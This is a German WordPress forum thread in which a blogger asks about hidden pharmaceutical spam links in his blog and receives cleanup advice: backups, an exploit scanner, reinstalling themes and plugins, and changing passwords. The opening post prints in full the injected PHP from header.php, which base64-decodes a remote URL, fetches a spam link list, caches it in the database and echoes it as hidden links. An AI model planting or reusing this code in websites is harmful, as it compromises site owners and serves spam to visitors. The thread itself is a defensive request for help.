• Schöne Scheiße!

    Im Quelltext meines blogs tauchten in einem 0px hohen div mit hidden overflow so schöne Begriffe auf wie "Viagra, Tramal, Tramaldol, Ciagris" und wie die Konsorten alle heißen.

    Ich fand dann in meiner header.php folgenden schadhaften Code:

    PHP
    <?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3MvdGVzdF8yMA=='; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>

    Wer macht so was warum und wie? Ich habe die aktuellste WP-Version, allerdings ein recht altes, geforktes Theme und ne Menge Plugins.

    Ich möchte aber natürlich nur ungern diese Plugins kicken und genausowenig möchte ich mein Theme ändern. Eigentlich.

    Hat jemand ne Idee, was da los ist?

    Beste Grüße
    pp

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ich könnte es auch dreamweaver durchsuchen lassen, wenn ich wüsste, nach was ich suchen soll...

    Nachtrag: Der betreffende Code steht auf jeden Fall im header aller Themes.

    Einmal editiert, zuletzt von pantoffelpunk (27. Februar 2009 um 16:42)

  • du musst erneuern -da geht nichts dran vorbei, dies ist ein Sicherheitsloch aus WP 2.0.1
    google war mein Freund ;)
    http://www.village-idiot.org/archives/2007/01/

    Vorgangsweise: hol Dir das Tool mysqldumper
    mache damit ein Datenbankbackup und lass es am Server

    dann hol dir dieses Plugin:
    WordPress Exploit Scanner
    lass es drüber laufen - ist wo Schadcode findet es diesen auch in der Datenbank,

    wurde was gefunden:säubern- ich habe dazu Teile des Schadcodes einfach in google.com eingegeben und fand so raschest Hilfe

    danach alle Dateien vom Server-alle!
    Deine Themes neu machen,
    Plugins erneuern - es gibt soviele die alten Code drin haben und somit unsicher sind

    alle Passwörter ändern- alle auch vom ftp, datenbank , adminzugang etc..


    in das Verzeichnis wp-content/plugins eine leere index.php legen

    ebenso in das Uploadverzeichnis

    bedenke es mag Arbeit sein, aber ist Dein Blog gehackt und trägt dann Links zu einschlägigen Seiten in sich ist es auch bald weg vom Fenster-und das ist mehr Arbeit

    lg

  • Du willst mich nur ärgern, stimmts?

    niente
    ich habe grade gestern und heut einige E-Mail Anfragen wegen vermeintlicher exploits von genau so alten DIngern ...

    die ziehen dann den Stecker vom Server oder Deiner Domain :???:

  • :-) War auch nur ein Scherz.

    Aber es ist doch eine aktuelle 2.7.1, die Plugins sind ebenfalls alle aktualisiert, so eine aktuelle Version vorhanden. Wie kann also ein Loch aus der 2.0.1 für einen Angriff von heute verantwortlich zeichnen?

  • :-) War auch nur ein Scherz.

    Aber es ist doch eine aktuelle 2.7.1, die Plugins sind ebenfalls alle aktualisiert, so eine aktuelle Version vorhanden. Wie kann also ein Loch aus der 2.0.1 für einen Angriff von heute verantwortlich zeichnen?

    in deinem Theme in einem alten Plugin ---> werde aktiv wenn...usw..
    lg

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!